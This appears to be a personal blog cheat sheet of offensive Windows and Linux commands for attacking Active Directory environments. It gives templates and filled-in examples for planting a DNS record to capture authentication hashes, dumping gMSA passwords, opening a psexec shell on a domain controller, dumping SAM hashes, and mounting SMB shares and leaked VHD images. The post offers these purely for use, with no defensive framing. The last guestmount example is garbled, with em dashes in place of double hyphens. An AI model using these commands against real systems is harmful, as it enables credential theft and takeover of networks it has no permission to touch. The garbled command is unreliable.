Useful Offensive Snippets

I will update this post regularly, I am starting with a few of my most commonly used snippets.

Windows

SMB Connect

smbclient -U <USER> //<HOST>/<SHARE>

Example

smbclient -U Diddy.Doodat //pwned.com/Backup

Add DNS record kerberos

Can be used to capture authentication hashes if you identify a service that will call a specific DNS record.

python3 dnstool.py -u '<DOMAIN>\<USER>' -p <PASSWORD> -r pwned.hacker.com -a add -t A -d <DOMAIN IP> <DNS IP>

krbrelayx/dnstool.py at master · dirkjanm/krbrelayx

Example

python3 dnstool.py -u 'hacked\diddy.doodat' -p OMGJonathanScott -r pwned.hacker.com -a add -t A -d 10.10.10.12 86.32.12.233

Dump gMSA password blobs

python3 gMSADumper.py -u '<USER>' -p '<PASSWORD>' -d <DOMAIN>

Example

python3 gMSADumper.py -u 'diddy.doodat' -p 'OMGJonathanScott' -d pwned.hacker.com

Mount SMB share to Linux Host

mount -t cifs //<HOST>/<SHARE> /tmp/mnt

Example

mount -t cifs //128.11.2.121/Pwned /tmp/mnt

Shell from Linux with Impacket (psexec)

impacket-psexec -k -no-pass <DOMAIN>/<USER>@<HOST>

Example

impacket-psexec -k -no-pass hacked.com/Administrator@dc.hacked.com

Dump SAM hashes on Linux

impacket-secretsdump -sam SAM -system SYSTEM local

Linux

Fix Clock Skew Error

Fix skew when trying to connect to exploit systems where the skew is too great.

sudo ntpdate <NTP SERVER IP>

Example

sudo ntpdate 10.11.1.211

Mount VHD

guestmount --add <IMAGE>.vhd --inspector --ro -v /tmp/vhd

Example

guestmount — add leaked.vhd — inspector — ro -v /tmp/vhd